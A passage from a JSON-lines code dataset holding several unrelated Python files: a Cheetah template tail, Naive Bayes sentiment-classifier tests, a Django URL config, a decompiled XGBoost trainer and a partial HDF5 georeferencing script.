        \n\n''')\n self.body(trans=trans)\n write(u'''\n\n''')\n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n ##################################################\n ## CHEETAH GENERATED ATTRIBUTES\n\n\n _CHEETAH__instanceInitialized = False\n\n _CHEETAH_version = __CHEETAH_version__\n\n _CHEETAH_versionTuple = __CHEETAH_versionTuple__\n\n _CHEETAH_genTime = __CHEETAH_genTime__\n\n _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__\n\n _CHEETAH_src = __CHEETAH_src__\n\n _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__\n\n _mainCheetahMethod_for_site= 'respond'\n\n## END CLASS DEFINITION\n\nif not hasattr(site, '_initCheetahAttributes'):\n templateAPIClass = getattr(site, '_CHEETAH_templateClass', Template)\n templateAPIClass._addCheetahPlumbingCodeToClass(site)\n\n\n# CHEETAH was developed by Tavis Rudd and Mike Orr\n# with code, advice and input from many other volunteers.\n# For more information visit http://www.CheetahTemplate.org/\n\n##################################################\n## if run from command line:\nif __name__ == '__main__':\n from Cheetah.TemplateCmdLineIface import CmdLineIface\n CmdLineIface(templateObj=site()).run()\n\n\n","sub_path":"service/io360/server/www/templates/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221993414","text":"import numpy as np\nfrom sklearn.naive_bayes import GaussianNB\n\nfrom bayes import *\n\n# These are hardcoded but you can change to your directory.\n# I'll change this during testing.\nneg_dir = 'review_polarity/txt_sentoken/neg'\npos_dir = 'review_polarity/txt_sentoken/pos'\n\nNEG3 = ['disconnect', 'phone', 'line', 'don', 'accept', 'charges', 'avoid', 'wretched',\n 'melodramatic', 'sisterhood', 'dramedy', 'hanging', 'figured', 'needed', 'touch',\n 'feminine', 'hanging', 'like', 'ideal', 'opportunity', 'film', 'features',\n 'incredible', 'palate', 'female', 'talent', 'capability', 'camera', 'brought',\n 'mind', 'sparkling', 'gems', 'sleepless', 'seattle', 'unsung', 'heroes', 'meg',\n 'ryan', 'diane', 'keaton', 'lisa', 'kudrow', 'play', 'trio', 'sisters',\n 'separated', 'career', 'judgments', 'family', 'ties', 'reunite', 'father',\n 'walter', 'matthau', 'admitted', 'hospital', 'alzheimer', 'disease', 'read',\n 'like', 'optimum', 'opportunity', 'rekindle', 'relationship', 'reflect',\n 'poignancy', 'past', 'script', 'sisters', 'delia', 'nora', 'ephron',\n 'exasperating', 'shapeless', 'dreck', 'teeming', 'emotional', 'fakery', 'hanging',\n 'overall', 'effect', 'tele', 'marketer', 'pestering', 'hours', 'don', 'option',\n 'doing', 'title', 'suggests', 'half', 'hour', 'ephron', 'sisters', 'use',\n 'telephone', 'conversations', 'basis', 'character', 'development', 'annoying',\n 'ineffective', 'device', 'cell', 'phones', 'ring', 'minutes', 'hurriedly',\n 'rushes', 'leaving', 'marginal', 'time', 'frustrated', 'viewer', 'relate',\n 'sisters', 'issues', 'problems', 'hanging', 'apple', 'pie', 'felt', 'getting',\n 'mere', 'crust', 'story', 'granted', 'genuine', 'moments', 'film', 'help',\n 'establish', 'remainder', 'strained', 'emotions', 'inferior', 'dramatic', 'muck',\n 'outrageous', 'strategy', 'hanging', 'series', 'largely', 'unrealized',\n 'attempts', 'character', 'development', 'expected', 'exhibit', 'compassion',\n 'courtesy', 'sisters', 'join', 'melodramatic', 'finale', 'able', 'identify',\n 'eve', 'ryan', 'open', 'caring', 'daughter', 'stayed', 'father', 'moved',\n 'forward', 'pursue', 'impending', 'career', 'georgia', 'keaton', 'eldest',\n 'daughter', 'celebrating', 'fifth', 'year', 'anniversary', 'magazine', 'called',\n 'georgia', 'maddy', 'kudrow', 'soap', 'opera', 'actress', 'spends', 'time',\n 'contemplating', 'possible', 'path', 'stardom', 'nursing', 'dog', 'ryan',\n 'convincing', 'performance', 'diverting', 'cuteness', 'agreeable', 'aspects',\n 'hanging', 'kudrow', 'delightfully', 'eccentric', 'kilter', 'airhead', 'phoebe',\n 'friends', 'totally', 'wasted', 'ditto', 'keaton', 'serving', 'double', 'shift',\n 'star', 'director', 'time', 'slot', 'difficult', 'priority', 'juggle', 'frenzy',\n 'apparent', 'chick', 'flick', 'distressing', 'lack', 'chuckles', 'reliable',\n 'matthau', 'reduced', 'chaotic', 'shtick', 'given', 'character', 'situation',\n 'depressing', 'amusing', 'peak', 'form', 'humor', 'hanging', 'represented',\n 'matthau', 'nasty', 'quips', 'ryan', 'eternal', 'battle', 'aforementioned',\n 'pooch', 'swallow', 'pill', 'accounts', 'chuckles', 'expel', 'film', 'curiosity',\n 'suddenly', 'tweaked', 'discover', 'promising', 'star', 'studded', 'approach',\n 'turn', 'viciously', 'sour', 'really', 'mystery', 'predictable', 'melodramatic',\n 'filth', 'hanging', 'certainly', 'fault', 'actresses', 'pin', 'screenplay',\n 'attempts', 'clear', 'vital', 'issues', 'minutes', 'spending', 'rest', 'running',\n 'time', 'annoying', 'flurry', 'phone', 'conversations', 'certainly', 'far',\n 'label', 'rewarding', 'experience', 'hanging', 'enjoyable', 'wrong', 'number',\n 'beginning']\nPOS11 = ['rented', 'brokedown', 'palace', 'night', 'blind', 'having', 'heard', 'enjoyed',\n 'immensely', 'despite', 'flaws', 'wishing', 'experience', 'suggest', 'reserving',\n 'judgement', 'movie', 'viewing', 'entirety', 'easy', 'task', 'superficially',\n 'bears', 'unfortunate', 'necessarily', 'unintended', 'resemblance', 'movies',\n 'notably', 'return', 'paradise', 'midnight', 'express', 'result', 'nearly',\n 'review', 'brokedown', 'palace', 'subsequently', 'read', 'hopelessly',\n 'entangled', 'making', 'obvious', 'comparisons', 'consequence', 'nearly',\n 'universal', 'condemnation', 'shame', 'fine', 'film', 'view', 'movie', 'let',\n 'say', 'attempt', 'portray', 'nightmarish', 'reality', 'world', 'criminal',\n 'justice', 'midnight', 'express', 'completely', 'moral', 'dilemma',\n 'examination', 'meaning', 'friendship', 'humanity', 'heart', 'return',\n 'paradise', 'view', 'film', 'compared', 'source', 'joseph', 'conrad',\n 'acclaimed', 'novel', 'lord', 'jim', 'problematically', 'basic', 'storyline',\n 'familiar', 'american', 'teenage', 'girls', 'vacation', 'sentenced', 'spend',\n 'lives', 'thai', 'prison', 'drug', 'smuggling', 'obvious', 'set', 'involving',\n 'suave', 'man', 'shadowy', 'criminal', 'conspiracy', 'corrupt', 'world',\n 'justice', 'girls', 'alice', 'claire', 'danes', 'darlene', 'kate', 'beckinsale',\n 'life', 'long', 'buddies', 'planned', 'high', 'school', 'graduation', 'trip',\n 'hawaii', 'secretly', 'changed', 'destination', 'exotic', 'thailand', 'telling',\n 'parents', 'hotel', 'sight', 'seeing', 'includes', 'sneaking', 'luxury', 'hotel',\n 'sip', 'expensive', 'drinks', 'poolside', 'caught', 'trying', 'charge', 'wrong',\n 'room', 'minor', 'transgression', 'later', 'come', 'haunt', 'saved', 'hotel',\n 'security', 'charming', 'friendly', 'australian', 'nick', 'daniel', 'lapaine',\n 'takes', 'care', 'polished', 'execution', 'girl', 'scam', 'proceeds', 'separate',\n 'girls', 'make', 'smooth', 'moves', 'alice', 'darlene', 'alarm', 'bells',\n 'going', 'viewers', 'present', 'nick', 'slick', 'stories', 'don', 'add', 'girls',\n 'course', 'naive', 'notice', 'long', 'happens', 'anticipating', 'inevitable',\n 'disappearance', 'fast', 'talking', 'smuggler', 'arrest', 'teenaged', 'sitting',\n 'ducks', 'airport', 'route', 'hong', 'kong', 'caught', 'holding', 'bag',\n 'literally', 'containing', 'heroin', 'just', 'predictably', 'thai', 'police',\n 'courts', 'meting', 'injustice', 'trusting', 'tourists', 'prison', 'bound',\n 'long', 'stretch', 'left', 'unanswered', 'red', 'herring', 'issue', 'girls',\n 'willing', 'accomplice', 'need', 'ready', 'answer', 'suggest', 'closer',\n 'scrutiny', 'bell', 'hop', 'girl', 'fleabag', 'hotel', 'door', 'comfortable',\n 'life', 'closed', 'girls', 'families', 'turn', 'desperation', 'noiresque',\n 'expatriate', 'lawyer', 'fixer', 'yankee', 'hank', 'pullam', 'thai', 'born',\n 'partner', 'wife', 'recurring', 'element', 'movie', 'tension', 'appearance',\n 'reality', 'expressed', 'film', 'tag', 'lines', 'trust', 'hank', 'exception',\n 'seasoned', 'movie', 'goers', 'familiar', 'pullman', 'oeuvre', 'surprises',\n 'remainder', 'movie', 'smorgasbord', 'intriguing', 'themes', 'incompletely',\n 'explored', 'short', 'hand', 'fashion', 'lou', 'diamond', 'phillips', 'instance',\n 'plays', 'delightfully', 'sinister', 'callous', 'dea', 'agent', 'appearing',\n 'casually', 'accommodating', 'hank', 'withholds', 'vital', 'information',\n 'crucial', 'moments', 'wider', 'conspiracy', 'inherently', 'powerful',\n 'somewhat', 'tired', 'premise', 'film', 'offers', 'parts', 'riveting',\n 'courtroom', 'drama', 'prison', 'story', 'potential', 'character', 'study',\n 'american', 'teens', 'relationship', 'constitutes', 'friendship', 'result',\n 'reasonably', 'engaging', 'suspenseful', 'girls', 'interaction', 'hank',\n 'investigation', 'various', 'trials', 'hearings', 'offering', 'hope', 'release',\n 'delivering', 'tension', 'does', 'foredoomed', 'possibility', 'escape',\n 'brokedown', 'palace', 'major', 'flaw', 'creators', 'tendency', 'like', 'time',\n 'constrained', 'tourists', 'frequent', 'trips', 'fascinating', 'alleys',\n 'reverse', 'direction', 'half', 'way', 'return', 'story', 'main', 'avenue',\n 'brokedown', 'palace', 'wouldn', 'good', 'movie', 'believe', 'writers',\n 'director', 'bigger', 'game', 'succeeded', 'main', 'theme', 'movie', 'like',\n 'proffered', 'location', 'freedom', 'permutations', 'ultimately', 'sub',\n 'themes', 'considered', 'window', 'dressing', 'young', 'pretty', 'alice',\n 'danes', 'old', 'soul', 'wild', 'streetwise', 'teenager', 'thirst', 'freedom',\n 'adventure', 'presented', 'perfect', 'blend', 'yin', 'yang', 'dark', 'light',\n 'cautious', 'best', 'friend', 'darlene', 'beckinsale', 'clear', 'eyed',\n 'straightforward', 'alice', 'complex', 'friend', 'comes', 'poorer', 'background',\n 'reputation', 'getting', 'trouble', 'lost', 'trust', 'including', 'father',\n 'darlene', 'life', 'track', 'aimed', 'college', 'marriage', 'kids', 'career',\n 'suburban', 'home', 'middle', 'age', 'fulfillment', 'alice', 'uncertain',\n 'unfocused', 'yearning', 'poignant', 'scene', 'film', 'shows', 'darlene',\n 'shouting', 'open', 'moat', 'visitors', 'friends', 'relatives', 'home', 'lives',\n 'continue', 'limbo', 'tellingly', 'alice', 'present', 'included', 'just',\n 'revealing', 'different', 'personalities', 'alice', 'dar', 'come', 'thailand',\n 'openness', 'delight', 'alice', 'face', 'doesn', 'read', 'simple', 'naivet',\n 'way', 'stands', 'stretches', 'friend', 'ride', 'small', 'boat', 'reaching',\n 'sun', 'really', 'drinking', 'believes', 'freedom', 'dar', 'remains', 'seated',\n 'shade', 'brokedown', 'palace', 'begins', 'admission', 'alice', 'guilt', 'tape',\n 'recording', 'sent', 'hank', 'unintentional', 'alice', 'fault', 'responsible',\n 'persuading', 'friend', 'lie', 'parents', 'sneak', 'away', 'safety', 'hawaii',\n 'perils', 'thailand', 'try', 'petty', 'scam', 'places', 'clutches', 'evil',\n 'nick', 'case', 'misses', 'point', 'inevitable', 'confusion', 'film',\n 'beginning', 'darlene', 'obligingly', 'reminds', 'alice', 'culpability',\n 'prison', 'dar', 'course', 'willing', 'dupe', 'view', 'confers', 'innocence',\n 'mind', 'coercion', 'reluctant', 'alice', 'accompany', 'hong', 'kong', 'placed',\n 'police', 'custody', 'place', 'naive', 'confession', 'sealed', 'fate', 'dar',\n 'innocent', 'doesn', 'matter', 'alice', 'subject', 'movie', 'journey',\n 'personal', 'freedom', 'way', 'treated', 'unsympathetic', 'portrait', 'shallow',\n 'american', 'culture', 'created', 'girls', 'half', 'baked', 'sensibilities',\n 'materialistic', 'goals', 'end', 'culture', 'like', 'representatives', 'yankee',\n 'hank', 'dar', 'father', 'man', 'knows', 'grease', 'wheels', 'proves',\n 'impotent', 'government', 'face', 'girl', 'tragedy', 'thailand', 'culture',\n 'contrary', 'opinion', 'comes', 'better', 'comparison', 'amazes', 'reviewers',\n 'argued', 'point', 'extremes', 'believe', 'filmmaker', 'view', 'thai', 'culture',\n 'vastly', 'different', 'american', 'necessarily', 'inferior', 'thai', 'sole',\n 'exceptions', 'corrupt', 'official', 'spiteful', 'prison', 'spy', 'uniformly',\n 'consistent', 'behavior', 'true', 'principles', 'girls', 'shown', 'treated',\n 'better', 'certainly', 'worse', 'native', 'born', 'prison', 'stark', 'contrast',\n 'probable', 'reality', 'hellhole', 'relatively', 'clean', 'sunlit', 'prison',\n 'authorities', 'demanded', 'good', 'hygiene', 'provided', 'medical', 'care',\n 'needed', 'hard', 'manual', 'labor', 'consisted', 'picking', 'grass', 'thai',\n 'guards', 'authoritarian', 'certainly', 'routinely', 'sadistic', 'thai',\n 'justice', 'reasoning', 'thai', 'judges', 'appeal', 'hearing', 'film',\n 'penultimate', 'scene', 'devastating', 'logic', 'morality', 'freedom', 'faces',\n 'brokedown', 'palace', 'explores', 'extreme', 'freedom', 'body', 'freedom',\n 'spirit', 'settle', 'remain', 'imprisoned', 'entire', 'nation', 'roam',\n 'freedom', 'seldom', 'comes', 'price', 'movie', 'tag', 'lines', 'dream', 'far',\n 'believe', 'make', 'good', 'case', 'interpretation', 'person', 'attains',\n 'freedom', 'incarcerated', 'film', 'end', 'alice', 'finds', 'redemption',\n 'salvation', 'acceptance', 'personal', 'responsibility', 'think', 'light',\n 'bathing', 'figure', 'assembled', 'prisoners', 'final', 'scene', 'visually',\n 'signals', 'fact', 'kate', 'beckinsale', 'character', 'properly', 'likened',\n 'released', 'temple', 'bird', 'referred', 'twice', 'film', 'trained', 'fly',\n 'cage', 'thai', 'magistrate', 'observed', 'film', 'climactic', 'scene', 'issue',\n 'character', 'jamaican', 'prisoner', 'clear', 'freedom', 'achieved', 'oneself',\n 'thinks', 'movie', 'character', 'transformed', 'experiences', 'increasingly',\n 'cinema', 'landscape', 'littered', 'endless', 'permutations', 'kung', 'woman',\n 'female', 'characters', 'virtually', 'indistinguishable', 'male', 'action',\n 'figures', 'story', 'modern', 'heroine', 'reading', 'user', 'comments', 'struck',\n 'unusual', 'phenomenon', 'person', 'liked', 'movie', 'praised', 'actors',\n 'think', 'time', 'came', 'away', 'motion', 'picture', 'possibly', 'hating',\n 'raving', 'performances', 'favor', 'rent', 'brokedown', 'palace', 'watch',\n 'open', 'mind', 'meets', 'eye']\n\nVOCAB_SUBSET100 = ['acceptable', 'accompanies', 'alek', 'allows', 'amistad', 'amnesia',\n 'anti', 'armored', 'arty', 'atrophied', 'authentically', 'barbecue',\n 'bastille', 'battles', 'beatrice', 'bedtimes', 'bolt', 'bombarded',\n 'braun', 'breathed', 'cavern', 'characers', 'charms', 'cimino',\n 'comely', 'compensating', 'contentious', 'delayed', 'deliveree',\n 'denise', 'dependant', 'deuce', 'disintegrated', 'doom', 'embarassed',\n 'enterprises', 'entrepreneur', 'eurocentrism', 'examinations',\n 'existing', 'exposure', 'fahdlan', 'fer', 'flirts', 'franken', 'gait',\n 'gloat', 'goal', 'groaning', 'groundbreaking', 'homeworld',\n 'hovertank', 'independance', 'inputs', 'instinctively',\n 'invincibility', 'kermit', 'lanai', 'lava', 'lavender', 'libidinous',\n 'locating', 'meshes', 'metamorphoses', 'moff', 'moribund', 'mortal',\n 'neptune', 'observatory', 'onstage', 'orbiting', 'overemotional',\n 'overly', 'paradise', 'paramedic', 'parent', 'paz', 'portion', 'prays',\n 'pseudonym', 'psycholically', 'quinland', 'redcoats', 'robo', 'sacred',\n 'shorten', 'silence', 'sincerely', 'solution', 'straits',\n 'supernaturally', 'taste', 'tryst', 'uneasiness', 'uninterrupted',\n 'walkway', 'wasting', 'won', 'xer', 'yield']\n\nneg = pos = None\n\ndef load():\n global neg, pos\n if neg is None or pos is None:\n neg = load_docs(neg_dir)\n pos = load_docs(pos_dir)\n return neg, pos\n\n\ndef test_load():\n neg, pos = load()\n # Pick sample docs to compare\n assert len(neg) == 1000\n assert len(pos) == 1000\n # print(neg[3])\n # print(pos[11])\n assert neg[3]==NEG3\n assert pos[11]==POS11\n\n\ndef test_vocab():\n neg, pos = load()\n V = vocab(neg,pos)\n assert len(V)==38372+1 # Add one for unknown at index 0\n\n rs = np.random.RandomState(42) # get same list back each time\n idx = rs.randint(0,len(V),size=100)\n allwords = np.array([*V.keys()])\n subset = allwords[idx]\n # print(sorted(subset))\n assert sorted(subset) == VOCAB_SUBSET100\n\n\ndef test_vectorize():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n allwords = np.array([*V.keys()])\n # print(list(allwords[np.where(vneg[3]>1)]))\n assert list(allwords[np.where(vneg[3] > 1)]) == \\\n ['annoying', 'attempts', 'career', 'certainly', 'character', 'chuckles',\n 'conversations', 'daughter', 'development', 'don', 'ephron', 'father', 'film',\n 'georgia', 'hanging', 'issues', 'keaton', 'kudrow', 'like', 'matthau',\n 'melodramatic', 'minutes', 'opportunity', 'phone', 'ryan', 'sisters', 'star', 'time']\n # print(list(allwords[np.where(vpos[5]>1)]))\n assert list(allwords[np.where(vpos[5] > 1)]) == \\\n ['action', 'actor', 'apart', 'ben', 'bruce', 'certainly', 'character',\n 'characters', 'day', 'don', 'fall', 'family', 'film', 'films', 'flashbacks',\n 'good', 'grown', 'heartbreaking', 'jordan', 'katie', 'life', 'like', 'lives',\n 'main', 'make', 'marriage', 'michelle', 'movies', 'nelson', 'nicely',\n 'performance', 'pfeiffer', 'picture', 'real', 'realistic', 'really', 'say',\n 'script', 'sense', 'shows', 'sophisticated', 'stepmom', 'story', 'strong',\n 'therapist', 'things', 'times', 'told', 'touching', 'viewer', 'willis',\n 'written', 'year', 'years']\n\n\ndef test_training_error():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n\n X = np.vstack([vneg, vpos])\n y = np.vstack(\n [np.zeros(shape=(len(vneg), 1)), np.ones(shape=(len(vpos), 1))]).reshape(-1)\n model = NaiveBayes621()\n model.fit(X, y)\n y_pred = model.predict(X)\n accuracy = np.sum(y==y_pred) / len(y)\n assert accuracy > 0.97, f\"Correct = {np.sum(y==y_pred)} / {len(y)} = {100*accuracy:.1f}%\"\n\n\ndef test_kfold_621():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n\n X = np.vstack([vneg, vpos])\n y = np.vstack(\n [np.zeros(shape=(len(vneg), 1)), np.ones(shape=(len(vpos), 1))]).reshape(-1)\n model = NaiveBayes621()\n\n accuracies = kfold_CV(model, X, y, k=4)\n true_accuracies = np.array([.836, .80, .806, .786])\n areclose = np.abs(true_accuracies - accuracies) < np.array([.5, .5, .5, .5])\n assert areclose.all(), f\"true accuracies {true_accuracies} and yours {accuracies} differ\"\n\n\ndef test_kfold_sklearn_vs_621():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n\n X = np.vstack([vneg, vpos])\n y = np.vstack([np.zeros(shape=(len(vneg), 1)), np.ones(shape=(len(vpos), 1))]).reshape(-1)\n\n accuracies = kfold_CV(NaiveBayes621(), X, y, k=4)\n\n sklearn_accuracies = kfold_CV(GaussianNB(), X, y, k=4)\n sklearn_true_accuracies = np.array([0.666, 0.678, 0.636, 0.662])\n\n werebetter = (accuracies - sklearn_true_accuracies) > np.array([.1, .1, .1, .1])\n assert werebetter.all(), f\"Your accuracies {accuracies} should be better than sklearn's {sklearn_accuracies}\"","sub_path":"projects/bayes/test_bayes.py","file_name":"test_bayes.py","file_ext":"py","file_size_in_byte":19264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"417095825","text":"\"\"\"homehubpi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url,include\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nfrom . import views\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login/$', auth_views.login, name='login'),\n url(r'^logout/$', auth_views.logout, name='logout'),\n url(r'^publisher/$', views.publisher, name='publisher'),\n \n url(r'^rest/', views.rest_set, name='rest'),\n url(r'^test/', views.rest_test, name='test'),\n url(r'^testpub/', views.rest_test_pubkey, name='rest_test_pubkey'),\n \n url(r'^devices/',include('devices.urls', namespace=\"devices\")),\n]\n","sub_path":"homehubpi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"325551154","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/cctyper/xgbtrain.py\n# Compiled at: 2020-04-24 10:15:28\n# Size of source mod 2**32: 7697 bytes\nimport os, sys, re, pandas as pd, itertools as it, numpy as np, xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom cctyper.xgb import XGB\n\nclass XGBTrain(object):\n\n def __init__(self, args):\n self.input = args.input\n self.out = args.output\n self.kmer = args.kmer\n self.minr = args.minr\n self.rnd_seed = args.rnd_seed\n self.test_size = args.test_size\n self.eta = args.eta\n self.threads = args.threads\n self.num_rounds = args.num_rounds\n self.early_stop = args.early_stop\n self.max_depth = args.max_depth\n self.subsample = args.subsample\n self.colsample_bytree = args.colsample_bytree\n self.nfold = args.nfold\n base_for = 'ACGT'\n base_rev = 'TGCA'\n self.comp_tab = str.maketrans(base_for, base_rev)\n self.read_input()\n self.out = os.path.join(self.out, '')\n self.check_out()\n self.prune_input()\n self.prepare_data()\n self.train()\n self.test()\n\n def read_input(self):\n self.dat = pd.read_csv((self.input), header=None, sep='\\t', names=('Type',\n 'Seq'))\n\n def is_dna(s):\n match = re.match('^[ACTGactg]*$', s)\n return match is not None\n\n for rep in list(self.dat['Seq']):\n if not is_dna(rep):\n print('Error - Non-DNA letters found in sequence:')\n print(rep)\n sys.exit()\n\n def check_out(self):\n try:\n os.mkdir(self.out)\n except FileExistsError:\n print('Directory ' + self.out + ' already exists')\n sys.exit()\n\n def prune_input(self):\n subtype, count = np.unique((self.dat['Type']), return_counts=True)\n print('\\x1b[92mCounts of subtypes:\\x1b[0m')\n print(list(zip(subtype, count)))\n self.incl = list(subtype[(count >= self.minr)])\n print('\\x1b[92mIncluding the following subtypes:\\x1b[0m')\n print(self.incl)\n self.label_dict = dict(zip(self.incl, range(len(self.incl))))\n f = open(self.out + 'type_dict.tab', 'w')\n for k, v in self.label_dict.items():\n f.write('{}:{}\\n'.format(k, v))\n else:\n f.close()\n self.dat = self.dat[self.dat['Type'].isin(self.incl)]\n\n def count_kmer(self, seq):\n kmer_d = {}\n for i in range(len(seq) - self.kmer + 1):\n kmer_for = seq[i:i + self.kmer]\n kmer_rev = kmer_for.translate(self.comp_tab)[::-1]\n if kmer_for < kmer_rev:\n kmer = kmer_for\n else:\n kmer = kmer_rev\n if kmer in kmer_d:\n kmer_d[kmer] += 1\n else:\n kmer_d[kmer] = 1\n else:\n return kmer_d\n\n def generate_canonical_kmer(self):\n letters = [\n 'A', 'C', 'G', 'T']\n all_kmer = [''.join(k) for k in it.product(letters, repeat=(self.kmer))]\n all_kmer_rev = [x.translate(self.comp_tab)[::-1] for x in all_kmer]\n can_kmer = list(it.compress(all_kmer_rev, [not kf < kr for kf, kr in zip(all_kmer, all_kmer_rev)]))\n can_kmer.sort()\n self.can_kmer = can_kmer\n\n def prepare_data(self):\n self.generate_canonical_kmer()\n X = pd.DataFrame([dict(zip(self.can_kmer, np.zeros(len(self.can_kmer))))] + [self.count_kmer(x) for x in self.dat['Seq']]).fillna(0)\n X = X.iloc[1:]\n y = [self.label_dict[x] for x in self.dat['Type']]\n X = X.reindex((sorted(X.columns)), axis=1)\n X_train, X_test, y_train, self.y_test = train_test_split(X, y, test_size=(self.test_size), random_state=(self.rnd_seed))\n self.dtrain = xgb.DMatrix(X_train, label=y_train)\n self.dtest = xgb.DMatrix(X_test, label=(self.y_test))\n\n def train(self):\n params = {'eta':self.eta, \n 'objective':'multi:softprob', \n 'eval_metric':'mlogloss', \n 'nthread':self.threads, \n 'num_class':len(self.incl)}\n print('\\x1b[92mUsing the following parameters:\\x1b[0m')\n print('eta: {}'.format(self.eta))\n print('num_rounds: {}'.format(self.num_rounds))\n print('early_stopping_rounds: {}'.format(self.early_stop))\n grid_params = [(\n max_depth, subsample, colsample_bytree) for max_depth in self.max_depth for subsample in self for colsample_bytree in self]\n print('\\x1b[92m' + 'Cross-validating with {} folds:'.format(self.nfold) + '\\x1b[0m')\n min_mlogloss = float('Inf')\n best_params = None\n for max_depth, subsample, colsample_bytree in grid_params:\n print('CV with max_depth={}, subsample={}, colsample_bytree={}'.format(max_depth, subsample, colsample_bytree))\n params['max_depth'] = max_depth\n params['subsample'] = subsample\n params['colsample_bytree'] = colsample_bytree\n cv_results = xgb.cv(params,\n (self.dtrain),\n num_boost_round=(self.num_rounds),\n seed=(self.rnd_seed),\n nfold=(self.nfold),\n metrics={\n 'mlogloss'},\n early_stopping_rounds=(self.early_stop))\n mean_mlogloss = cv_results['test-mlogloss-mean'].min()\n boost_rounds = cv_results['test-mlogloss-mean'].argmin()\n print('\\tmlogloss {} for {} rounds'.format(mean_mlogloss, boost_rounds))\n if mean_mlogloss < min_mlogloss:\n min_mlogloss = mean_mlogloss\n best_params = (max_depth, subsample, colsample_bytree, boost_rounds)\n print('Best params: {}, {}, {}, mlogloss: {}'.format(best_params[0], best_params[1], best_params[2], min_mlogloss))\n print('\\x1b[92mTraining final model\\x1b[0m')\n params['max_depth'] = best_params[0]\n params['subsample'] = best_params[1]\n params['colsample_bytree'] = best_params[2]\n self.model = xgb.train(params,\n (self.dtrain),\n num_boost_round=(self.num_rounds),\n evals=[\n (\n self.dtest, 'Test')],\n early_stopping_rounds=(self.early_stop))\n self.boost_rounds = self.model.best_iteration\n self.model.save_model(self.out + 'xgb_repeats.model')\n\n def test(self):\n y_pred = self.model.predict((self.dtest), ntree_limit=(self.boost_rounds))\n conf = confusion_matrix(self.y_test, [x.argmax() for x in y_pred])\n conf_df = pd.DataFrame(conf, columns=(self.incl), index=(self.incl))\n conf_df.to_csv((self.out + 'confusion_matrix.tab'), sep='\\t')\n type_acc = np.diag(conf_df) / conf_df.sum(axis=1)\n print('\\x1b[92mOverall accuracy:\\x1b[0m')\n print(np.diag(conf).sum() / conf.sum())\n print('\\x1b[92mAccuracy per subtype:\\x1b[0m')\n print(type_acc)\n print('\\x1b[92mAdjusted accuracy:\\x1b[0m')\n print(type_acc.mean())","sub_path":"pycfiles/cctyper-1.0.7-py3.8/xgbtrain.cpython-38.py","file_name":"xgbtrain.cpython-38.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"480568032","text":"# -*- coding: utf-8 -*-\n\"\"\"Georeference an HDF5 files for compatibility with GIS and GDAL tools. Needs\nwork.\n\"\"\"\n\nimport json\nimport os\n\nimport click\nimport h5py\n\nfrom osgeo import osr\n\n\n# Help printouts\nFILE_HELP = (\"The path to the target HDF5 file.\")\nPROFILE_HELP = (\"A dictionary containing a `crs` and `geotransform` \"\n \"(or just `transform`) entry representing the cooridnate \"\n \"geometries of the target HDF5 datasets.\")\nCRS_HELP = (\"The coordinate reference system of the target HDF5 file. Can be \"\n \"an EPSG code or proj4 string. By default, this will search the \"\n \"file's attributes for a profile dictionary with a `crs` entry.\")\nGEOTRANSFORM_HELP = (\"The geotransformation values of the target HDF5 \"\n \"file datasets in rasterio format. By default, this will \"\n \"search the files' attributes for a dictionary with \"\n \"`transform` or `geotransform` entries:\\n \"\n \"(x-resolution, x-rotation, x-min, y-rotation, \"\n \"y-resolution, y-min)\")\n\n@click.command()\n@click.option(\"--file\", \"-f\", required=True, help=FILE_HELP)\n@click.option(\"--profile\", \"-p\", default=None, help=PROFILE_HELP)\n@click.option(\"--crs\", \"-c\", default=None, help=CRS_HELP)\n@click.option(\"--geotransform\", \"-g\", default=None, help=GEOTRANSFORM_HELP)\ndef main(file, profile, crs, geotransform):\n \"\"\"Georeference an HDF5 files for compatibility with GIS and GDAL tools.\n\n file = \"/shared-projects/rev/projects/duke/data/exclusions/Duke_Exclusions.h5\"\n profile = None\n crs = None\n geotransform = None\n \"\"\"\n\n # Expand file path\n os.path.expanduser(file)\n\n # Check for existing georeferencing information if profile not given\n if not profile:\n if not crs or not geotransform:\n with h5py.File(file, \"r\") as h5:\n keys = h5.keys()\n akeys = h5.attrs.keys()\n if \"profile\" in akeys:\n profile = h5.attrs[\"profile\"]\n else:\n for ds in keys:\n if \"profile\" in h5[key].attrs.keys():\n profile = h5[key].attrs[\"profile\"]\n else:\n profile = None\n else:\n if not geotransform and crs:\n raise ValueError(\"Not enough information: need Geotransform.\")\n if geotransform and not crs:\n raise ValueError(\"Not 